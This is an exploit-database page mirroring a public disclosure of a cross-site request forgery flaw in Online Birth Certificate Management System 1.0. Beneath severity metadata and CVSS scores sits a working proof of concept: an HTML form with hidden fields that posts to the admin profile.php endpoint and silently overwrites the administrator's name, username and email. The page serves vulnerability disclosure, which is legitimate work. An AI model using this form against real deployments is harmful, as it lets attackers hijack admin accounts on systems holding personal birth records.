Advertisement






Online Birth Certificate Management System 1.0 Cross Site Request Forgery

CVE Category Price Severity
N/A CWE-352 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2022-09-27
CPE
cpe:cpe:/a:online-birth-certificate-management-system:1.0
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022090074

Below is a copy:

Online Birth Certificate Management System 1.0 Cross Site Request Forgery
# Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

# no token in update profile admin

<html>
    <head>
        <title> CSRF update Profile </title>
    </head>
    <body>
        <form action="http://localhost/OBCMS/admin/profile.php" method="post" enctype="multipart/form-data">
            <input type="hidden" name="adminname" value="csrf111">
            <input type="hidden" name="username" value="csrf">
            <input type="hidden" name="email" value="csrf">
            <input type="hidden" name="mobilenumber" value="0">
            <button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="submit">Save Change</button>
        </form>
    </body>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum